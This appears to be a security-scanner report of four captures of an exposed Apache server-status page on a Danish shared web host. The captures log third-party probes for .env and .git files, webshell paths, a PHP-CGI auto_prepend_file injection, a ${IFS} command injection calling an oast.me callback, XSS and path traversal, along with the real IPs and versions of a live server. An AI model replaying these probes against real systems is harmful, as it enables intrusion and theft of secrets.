81.19.232.105www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde35cb64774
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 31-May-2024 11:22:04 CEST Restart Time: Friday, 31-May-2024 04:00:07 CEST Parent Server Generation: 7 Server uptime: 7 hours 21 minutes 56 seconds Total accesses: 29516 - Total Traffic: 22.6 MB CPU Usage: u3.71 s2.02 cu0 cs0 - .0216% CPU load 1.11 requests/sec - 894 B/second - 803 B/request 1 requests currently being processed, 31 idle workers ____W___________________________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-744960/39/864_ 0.11000.00.010.42 159.89.17.243webhotel5.webhosting.dkGET /config.json HTTP/1.0 1-744970/34/864_ 0.09000.00.010.34 159.89.17.243webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 2-744980/36/861_ 0.10000.00.030.39 81.19.232.105webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 3-744990/36/862_ 0.12070.00.120.51 46.101.111.185webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 4-745000/34/860W 0.08000.00.010.48 81.19.232.105webhotel5.webhosting.dkGET /server-status HTTP/1.0 5-745010/35/859_ 0.11000.00.010.61 46.101.111.185webhotel5.webhosting.dkGET /.env HTTP/1.0 6-745020/35/852_ 0.09010.00.010.36 46.101.111.185webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 7-745030/35/849_ 0.10010.00.010.31 46.101.111.185webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 8-745050/35/851_ 0.10060.00.010.31 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 9-745060/35/849_ 0.07000.00.030.34 81.19.232.105webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 10-745070/35/847_ 0.11000.00.011.25 159.89.17.243webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 11-745080/35/844_ 0.09000.00.010.45 81.19.232.105webhotel5.webhosting.dkGET /about HTTP/1.0 12-745110/35/844_ 0.08000.00.020.40 46.101.111.185webhotel5.webhosting.dkGET /config.json HTTP/1.0 13-745120/35/809_ 0.10000.00.012.30 81.19.232.105webhotel5.webhosting.dkGET /server HTTP/1.0 14-745130/35/798_ 0.09010.00.020.43 159.89.17.243webhotel5.webhosting.dkGET /.git/config HTTP/1.0 15-745140/35/847_ 0.08000.00.100.86 159.89.17.243webhotel5.webhosting.dkGET /.env HTTP/1.0 16-745150/35/798_ 0.10000.00.020.43 46.101.111.185webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 17-745160/35/758_ 0.11000.00.060.35 81.19.232.105webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 18-745170/35/809_ 0.09000.00.290.68 159.89.17.243webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 19-745180/35/797_ 0.09000.00.020.35 81.19.232.105webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 20-745400/35/766_ 0.09000.00.020.48 81.19.232.105webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 21-745530/35/822_ 0.12000.00.020.49 81.19.232.105webhotel5.webhosting.dkGET /about HTTP/1.0 22-745720/35/800_ 0.09000.00.020.34 81.19.232.105webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 23-745840/34/823_ 0.08000.00.120.83 81.19.232.105webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 24-745950/35/791_ 0.09030.02.162.61 81.19.232.105webhotel5.webhosting.dkGET /server-status HTTP/1.0 25-746120/35/750_ 0.07070.00.020.41 159.89.17.243webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 26-746330/35/722_ 0.08000.00.060.33 81.19.232.105webhotel5.webhosting.dkGET /login.action HTTP/1.0 27-746390/35/707_ 0.06000.00.010.29 81.19.232.105webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 28-746750/34/591_ 0.08010.00.010.35 159.89.17.243webhotel5.webhosting.dkGET /login.action HTTP/1.0 29-747050/34/591_ 0.11000.00.010.24 81.19.232.105webhotel5.webhosting.dkGET /server HTTP/1.0 30-755750/34/538_ 0.08000.00.030.28 159.89.17.243webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 31-7148610/14/505_ 0.03000.00.020.24 46.101.111.185webhotel5.webhosting.dkGET /.git/config HTTP/1.0 32-6-0/0/497. 0.11131700.00.000.22 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 33-6-0/0/446. 0.10131700.00.000.17 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 34-6-0/0/605. 0.11131700.00.000.30 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-6-0/0/555. 0.11131700.00.000.43 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-6-0/0/455. 0.12131700.00.000.21 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-6-0/0/415. 0.10365700.00.000.31 193.176.211.234webhotel5.webhosting.dkGET /wp-content/plugins/woo-maxicashgateway_woo2-82/ HTTP/1.0 38-6-0/0/208. 0.11365710.00.000.14 216.244.66.239webhotel5.webhosting.dkt&publicationName=temp&issueName=Issue_21_2020&page=24 HTTP/1.0 39-5-0/0/158. 0.09503530.00.000.19 58.96.90.182www.lillekrabbe.dkGET /lab/dollmaker/converse1green.gif HTTP/1.0 40-5-0/0/50. 0.09504600.00.000.94 193.176.211.249webhotel5.webhosting.dkGET /wp-admin/maint/wp-conflg.php HTTP/1.0 41-5-0/0/50. 0.09504800.00.000.28 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/SimplePie/admin.php HTTP/1.0 42-5-0/0/50. 0.11504900.00.000.01 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/blogs.php HTTP/1.0 43-5-0/0/50. 0.09504600.00.000.02 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/Text/Diff/Engine/cache.php HTTP/1.0 44-5-0/0/50. 0.09504510.00.000.02 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/customize/install.php HTTP/1.0 45-5-0/0/50. 0.11504500.00.000.02 193.176.211.249webhotel5.webhosting.dkGET /wp-content/backup.php HTTP/1.0 46-5-0/0/50. 0.10504310.00.000.02 193.176.211.249webhotel5.webhosting.dkGET /wp-content/uploads/2023/03/paok.php HTTP/1.0 47-5-0/0/50. 0.11504400.00.000.07 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/ID3/readme.php HTTP/1.0 48-5-0/0/50. 0.10504200.00.000.26 193.176.211.249webhotel5.webhosting.dkGET /wp-content/uploads/2016/ss36.php HTTP/1.0 49-5-0/0/50. 0.08504110.00.000.02 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 50-5-0/0/50. 0.09504000.00.000.01 193.176.211.249</
The server-status page (usually /server-status
) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde337277cbf
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 22-Nov-2024 07:36:52 CET Restart Time: Friday, 22-Nov-2024 06:05:04 CET Parent Server Generation: 1 Server uptime: 1 hour 31 minutes 48 seconds Total accesses: 8415 - Total Traffic: 3.2 MB CPU Usage: u6.19 s1.17 cu0 cs0 - .134% CPU load 1.53 requests/sec - 614 B/second - 401 B/request 1 requests currently being processed, 47 idle workers _______W_________________________._______________............... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1405420/47/230_ 0.191500.00.020.08 143.244.41.251webhotel5.webhosting.dkGET /ova.php HTTP/1.0 1-1405430/48/228_ 0.201400.00.020.09 143.244.41.251webhotel5.webhosting.dkGET /defaults.php HTTP/1.0 2-1405460/47/223_ 0.18000.00.020.07 139.59.132.8webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 3-1405470/48/226_ 0.18000.00.020.17 139.59.132.8webhotel5.webhosting.dkGET /about HTTP/1.0 4-1405490/49/227_ 0.17000.00.020.08 139.59.132.8webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 5-1405510/48/229_ 0.19000.00.020.16 139.59.132.8webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 6-1405520/47/227_ 0.201800.00.020.07 66.249.72.238webhotel5.webhosting.dk/product/2/0/20101_rattan_kurv_firkantet_mini_3__2.jpg HTTP/1.0 7-1405530/45/225W 0.20000.00.020.07 139.59.132.8webhotel5.webhosting.dkGET /server-status HTTP/1.0 8-1405540/48/225_ 0.18000.00.030.09 139.59.132.8webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 9-1405550/44/219_ 0.171500.00.020.07 143.244.41.251webhotel5.webhosting.dkGET /admin.php?p= HTTP/1.0 10-1405560/46/227_ 0.171500.00.020.08 143.244.41.251webhotel5.webhosting.dkGET /wp-content/uploads/wp_live_chat/abruzi.php HTTP/1.0 11-1405600/47/227_ 0.171920.00.020.07 195.191.219.131www.hvilsted.dkGET / HTTP/1.0 12-1405610/44/221_ 0.181500.00.020.09 143.244.41.251webhotel5.webhosting.dkGET /an.php HTTP/1.0 13-1405620/45/225_ 0.181600.00.020.07 143.244.41.251webhotel5.webhosting.dkGET /wp-content/plugins/Cache/Cache.php HTTP/1.0 14-1405630/47/229_ 0.171760.00.020.07 136.143.176.51webhotel5.webhosting.dkGET / HTTP/1.0 15-1405640/48/228_ 0.211600.00.020.07 143.244.41.251webhotel5.webhosting.dkGET /bgf.php HTTP/1.0 16-1405650/46/226_ 0.201400.00.020.08 143.244.41.251webhotel5.webhosting.dkGET /wp-content/themes/eew.php HTTP/1.0 17-1405670/47/222_ 0.201400.00.020.08 143.244.41.251webhotel5.webhosting.dkGET /plugins.php HTTP/1.0 18-1405680/47/226_ 0.191400.00.020.11 143.244.41.251webhotel5.webhosting.dkGET /wp-blog.php HTTP/1.0 19-1405690/47/226_ 0.191400.00.020.11 143.244.41.251webhotel5.webhosting.dkGET /la.php HTTP/1.0 20-1405700/45/224_ 0.201400.00.020.07 143.244.41.251webhotel5.webhosting.dkGET /wp-info.php HTTP/1.0 21-1405710/46/221_ 0.18700.00.020.07 173.236.247.87webhotel5.webhosting.dkGET /portfolio/wp-login.php HTTP/1.0 22-1405720/46/222_ 0.19000.00.020.07 155.248.250.253webhotel5.webhosting.dk${IFS}1${IFS}csv4crg9cumnapak83n0ej5pzitbsqmk6.oast.me HTTP/1.0 23-1418460/38/216_ 0.151400.00.020.10 143.244.41.251webhotel5.webhosting.dkGET /options.php HTTP/1.0 24-1429560/34/204_ 0.131400.00.010.06 143.244.41.251webhotel5.webhosting.dkGET /worksec.php HTTP/1.0 25-1429580/36/209_ 0.121500.00.010.06 143.244.41.251webhotel5.webhosting.dkGET /wp-content/plugins/core/include.php HTTP/1.0 26-1405730/44/219_ 0.20260.00.020.12 35.222.37.131webhotel5.webhosting.dkGET / HTTP/1.0 27-1429590/36/204_ 0.131500.00.010.06 143.244.41.251webhotel5.webhosting.dkGET /wp-includes/pomo/about.php HTTP/1.0 28-1450280/29/192_ 0.111430.00.010.06 45.10.153.219webhotel5.webhosting.dkGET / HTTP/1.0 29-1450310/29/169_ 0.091400.00.010.05 143.244.41.251webhotel5.webhosting.dkGET /.well-known/ HTTP/1.0 30-1450320/28/176_ 0.091400.00.010.08 143.244.41.251webhotel5.webhosting.dkGET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.0 31-1450340/30/168_ 0.091400.00.010.05 143.244.41.251webhotel5.webhosting.dkGET /wp-content/uploads/ HTTP/1.0 32-1450350/29/174_ 0.091300.00.010.06 143.244.41.251webhotel5.webhosting.dkGET /ALFA_DATA/ HTTP/1.0 33-1-0/0/145. 0.183800.00.000.04 143.244.41.251webhotel5.webhosting.dkGET /wp-includes/rest-api/about.php HTTP/1.0 34-1405740/44/190_ 0.182170.00.020.06 195.191.219.131www.hvilsted.dkGET /robots.txt HTTP/1.0 35-1405750/45/172_ 0.17030.00.020.09 139.59.132.8webhotel5.webhosting.dkGET / HTTP/1.0 36-1405760/46/175_ 0.16030.00.020.06 139.59.132.8webhotel5.webhosting.dkGET / HTTP/1.0 37-1405770/47/93_ 0.19000.00.020.03 139.59.132.8webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 38-1405780/47/95_ 0.19000.00.020.04 139.59.132.8webhotel5.webhosting.dkGET /server HTTP/1.0 39-1450360/25/73_ 0.061400.00.010.02 143.244.41.251webhotel5.webhosting.dkGET /.well-known/pki-validation/ HTTP/1.0 40-1450370/30/79_ 0.091400.00.010.03 143.244.41.251webhotel5.webhosting.dkGET /wp-content/themes/tflow/ HTTP/1.0 41-1450380/29/79_ 0.081400.00.010.03 143.244.41.251webhotel5.webhosting.dkGET /wp-admin/ HTTP/1.0 42-1450390/29/29_ 0.071300.00.030.03 143.244.41.251webhotel5.webhosting.dkGET /wp-admin/js/ HTTP/1.0 43-1450400/29/29_ 0.101400.00.010.01 143.244.41.251webhotel5.webhosting.dkGET /wordpress/wp-admin/includes HTTP/1.0 44-1450410/27/27_ 0.07300.00.010.01 155.248.250.253webhotel5.webhosting.dkGET /signup?next=http://interact.sh/?app.scan/ HTTP/1.0 45-1450420/30/30_ 0.09610.00.020.02 195.191.219.131www.hvilsted.dkGET / HTTP/1.0 46-1450430/27/27_ 0.051000.00.010.01 103.74.121.169webhotel5.webhosting.dkGET /portfolio/wp-login.php HTTP/1.0 47-1450440/29/29_ 0.11800.00.020.02 155.248.250.253webhotel5.webhosting.dkGET /login?next=http://interact.sh/?app.scan/ HTTP/1.0 48-1450450/29/29_ 0.08700.00.020.02 195.191.219.131www.hvilsted.dkGET /robots.txt HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3b7a14c1e
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 20-Nov-2024 19:10:57 CET Restart Time: Wednesday, 20-Nov-2024 16:05:04 CET Parent Server Generation: 3 Server uptime: 3 hours 5 minutes 53 seconds Total accesses: 23480 - Total Traffic: 10.2 MB CPU Usage: u1.13 s.37 cu0 cs0 - .0134% CPU load 2.11 requests/sec - 962 B/second - 457 B/request 1 requests currently being processed, 37 idle workers ______________________________W_______.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-399590/19/701_ 0.03910.00.000.22 13.75.234.38www.woodwind.dkHEAD /bk HTTP/1.0 1-399600/19/673_ 0.03900.00.000.37 157.250.160.25www.woodwind.dkHEAD /bk HTTP/1.0 2-399610/18/675_ 0.03900.00.000.35 13.75.234.38www.woodwind.dkHEAD /backup HTTP/1.0 3-399620/19/657_ 0.03800.00.000.47 157.250.160.25www.woodwind.dkHEAD /backup HTTP/1.0 4-399630/19/657_ 0.02600.00.000.34 77.21.133.56webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 5-399640/19/661_ 0.04410.00.000.20 157.250.160.11webhotel5.webhosting.dkGET / HTTP/1.0 6-399650/15/651_ 0.02200.00.000.23 190.89.239.214webhotel5.webhosting.dkGET /index.php HTTP/1.0 7-399660/19/661_ 0.03260.00.000.25 159.89.12.166webhotel5.webhosting.dkGET / HTTP/1.0 8-399720/17/656_ 0.031110.00.020.36 157.250.160.25www.woodwind.dkHEAD / HTTP/1.0 9-399780/17/654_ 0.031050.00.010.22 157.250.160.25www.woodwind.dkGET /Saxophone%20Mouthpiece%20Facing%20Charts.htm HTTP/1.0 10-399800/19/658_ 0.03940.00.000.30 159.89.12.166webhotel5.webhosting.dkGET / HTTP/1.0 11-399840/16/652_ 0.03910.00.020.19 157.250.160.25www.woodwind.dkHEAD / HTTP/1.0 12-3100180/17/654_ 0.03700.00.000.24 13.75.234.38www.woodwind.dkHEAD /home HTTP/1.0 13-3100290/17/641_ 0.03600.00.000.20 157.250.160.25www.woodwind.dkHEAD /home HTTP/1.0 14-3100300/17/652_ 0.03500.00.000.22 190.89.239.214webhotel5.webhosting.dkGET /wp-content/mu-plugins/test-mu-plugin.php HTTP/1.0 15-3100310/19/634_ 0.02210.00.000.19 159.89.12.166webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 16-3100640/19/660_ 0.03000.00.000.20 159.89.12.166webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 17-3101610/19/636_ 0.03000.00.000.27 159.89.12.166webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 18-3107040/17/631_ 0.03100.00.000.37 159.89.12.166webhotel5.webhosting.dkGET /server HTTP/1.0 19-3108230/16/634_ 0.02800.00.000.19 157.250.160.25www.woodwind.dkHEAD /old HTTP/1.0 20-3108260/16/638_ 0.04800.00.000.22 13.75.234.38www.woodwind.dkHEAD /old HTTP/1.0 21-3108270/16/624_ 0.02800.00.000.72 13.75.234.38www.woodwind.dkHEAD /new HTTP/1.0 22-3108300/16/642_ 0.04760.00.000.35 205.169.39.20webhotel5.webhosting.dkGET / HTTP/1.0 23-3108310/16/576_ 0.03700.00.010.22 157.250.160.25www.woodwind.dkHEAD /new HTTP/1.0 24-3108320/15/617_ 0.03700.00.000.46 13.75.234.38www.woodwind.dkHEAD /main HTTP/1.0 25-3108330/15/570_ 0.01700.00.000.39 157.250.160.25www.woodwind.dkHEAD /main HTTP/1.0 26-399470/22/571_ 0.04100.00.000.22 159.89.12.166webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 27-399480/21/562_ 0.03200.00.000.15 172.109.143.70webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 28-399490/20/558_ 0.03100.00.010.29 159.89.12.166webhotel5.webhosting.dkGET /about HTTP/1.0 29-399500/20/558_ 0.02000.00.000.18 159.89.12.166webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 30-399510/20/563W 0.02000.00.000.16 159.89.12.166webhotel5.webhosting.dkGET /server-status HTTP/1.0 31-399520/20/509_ 0.0211280.00.000.16 157.250.160.25www.woodwind.dkHEAD /wordpress HTTP/1.0 32-399530/19/509_ 0.031100.00.000.19 13.75.234.38www.woodwind.dkHEAD / HTTP/1.0 33-399540/19/468_ 0.061000.00.000.15 13.75.234.38www.woodwind.dkHEAD /wp HTTP/1.0 34-399550/19/461_ 0.031000.00.000.15 13.75.234.38www.woodwind.dkHEAD / HTTP/1.0 35-399560/18/426_ 0.021010.00.000.17 157.250.160.25www.woodwind.dkHEAD /wp HTTP/1.0 36-399570/20/423_ 0.031000.00.090.32 13.75.234.38www.woodwind.dkHEAD /bc HTTP/1.0 37-399580/17/358_ 0.021000.00.000.11 157.250.160.25www.woodwind.dkHEAD /bc HTTP/1.0 38-2-0/0/261. 0.0164700.00.000.07 136.144.33.203webhotel5.webhosting.dkGET /wp-content/themes/digital-download/up.php HTTP/1.0 39-2-0/0/145. 0.07205400.00.000.04 52.237.244.122webhotel5.webhosting.dkHEAD /old HTTP/1.0 40-2-0/0/149. 0.08203200.00.000.04 74.176.62.236webhotel5.webhosting.dkHEAD /wordpress HTTP/1.0 41-1-0/0/49. 0.06531900.00.000.03 174.138.18.120webhotel5.webhosting.dkGET /wp-includes/shell1.php HTTP/1.0 42-1-0/0/50. 0.06532000.00.000.01 174.138.18.120webhotel5.webhosting.dkGET /wxo.php HTTP/1.0 43-1-0/0/49. 0.07531900.00.000.01 174.138.18.120webhotel5.webhosting.dkGET /css/4O4.php HTTP/1.0 44-1-0/0/46. 0.06531900.00.000.01 174.138.18.120webhotel5.webhosting.dkGET /css/radio.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde33308510a
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 18-Nov-2024 20:30:39 CET Restart Time: Monday, 18-Nov-2024 19:24:59 CET Parent Server Generation: 1 Server uptime: 1 hour 5 minutes 40 seconds Total accesses: 11224 - Total Traffic: 3.3 MB CPU Usage: u2.7 s.52 cu0 cs0 - .0817% CPU load 2.85 requests/sec - 864 B/second - 303 B/request 1 requests currently being processed, 32 idle workers _________________.__...._W____________.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1574550/24/348_ 0.09100.00.010.11 167.172.158.128webhotel5.webhosting.dkGET /server HTTP/1.0 1-1574650/25/356_ 0.08100.00.010.09 167.172.158.128webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 2-1574660/25/353_ 0.06000.00.010.10 167.172.158.128webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 3-1574690/26/357_ 0.05000.00.010.10 167.172.158.128webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 4-1574700/24/345_ 0.042500.00.010.14 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-1574710/25/343_ 0.052400.00.010.10 80.94.95.190webhotel5.webhosting.dkGET /RDWeb/Pages/en-US/login.aspx HTTP/1.0 6-1574880/23/344_ 0.052200.00.000.15 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-1575210/23/344_ 0.061300.00.010.10 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-1575230/24/356_ 0.06600.00.010.11 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-1575250/24/345_ 0.07240.00.010.11 167.172.158.128webhotel5.webhosting.dkGET / HTTP/1.0 10-1575260/25/344_ 0.07500.00.010.15 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-1575280/23/340_ 0.08230.00.010.09 167.172.158.128webhotel5.webhosting.dkGET / HTTP/1.0 12-1575480/25/344_ 0.07100.00.010.09 167.172.158.128webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 13-1575870/23/341_ 0.07100.00.010.09 167.172.158.128webhotel5.webhosting.dkGET /about HTTP/1.0 14-1575880/23/343_ 0.06030.00.010.09 205.210.31.107webhotel5.webhosting.dkGET / HTTP/1.0 15-1592910/16/330_ 0.041200.00.000.09 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-1593170/16/327_ 0.041200.00.010.09 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-1-0/0/315. 0.1451060.00.000.08 162.158.42.210webhotel5.webhosting.dkGET /?find-new%2F759753%2Fposts HTTP/1.0 18-1593240/14/277_ 0.02700.00.000.08 127.0.0.1webhotel5.webhosting.dkGET /cucm-uds/users HTTP/1.0 19-1593250/16/330_ 0.04700.00.000.09 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-1-0/0/313. 0.1472330.00.000.09 172.71.147.147webhotel5.webhosting.dkGET /?find-new%2F1872615%2Fposts HTTP/1.0 21-1-0/0/261. 0.1472150.00.000.08 162.158.42.210webhotel5.webhosting.dkGET /?find-new%2F1872912%2Fposts HTTP/1.0 22-1-0/0/265. 0.13719550.00.000.07 139.144.68.207webhotel5.webhosting.dkGET / HTTP/1.0 23-1-0/0/318. 0.1271930.00.000.08 172.68.22.163webhotel5.webhosting.dkGET /?find-new%2F1873194%2Fposts HTTP/1.0 24-1538620/42/257_ 0.112300.00.010.08 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-1538710/42/305W 0.12000.00.010.08 167.172.158.128webhotel5.webhosting.dkGET /server-status HTTP/1.0 26-1538720/42/311_ 0.102300.00.010.09 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-1538780/42/258_ 0.122300.00.030.08 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-1546970/37/254_ 0.12000.00.010.07 127.0.0.1webhotel5.webhosting.dkrt%28document.domain%29%3C%2Fscript%3E&sortitem&filter HTTP/1.0 29-1546980/37/252_ 0.10000.00.020.07 127.0.0.1webhotel5.webhosting.dkjndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.0 30-1546990/37/251_ 0.12000.00.010.06 167.172.158.128webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 31-1564600/28/259_ 0.062200.00.010.07 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-1564610/28/259_ 0.071700.00.010.07 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-1564620/28/196_ 0.082200.00.010.05 5.255.231.156webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 34-1564630/27/194_ 0.062200.00.010.05 203.78.146.114webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 35-1564640/28/146_ 0.082000.00.010.04 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 36-1564650/28/146_ 0.082200.00.010.04 213.180.203.207webhotel5.webhosting.dkGET /shop/357-opskrift-opus-8/ HTTP/1.0 37-1564660/26/93_ 0.062100.00.010.02 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 38-0-0/0/18. 0.03183400.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-0-0/0/17. 0.03183400.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-0-0/0/17. 0.03183400.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-0-0/0/16. 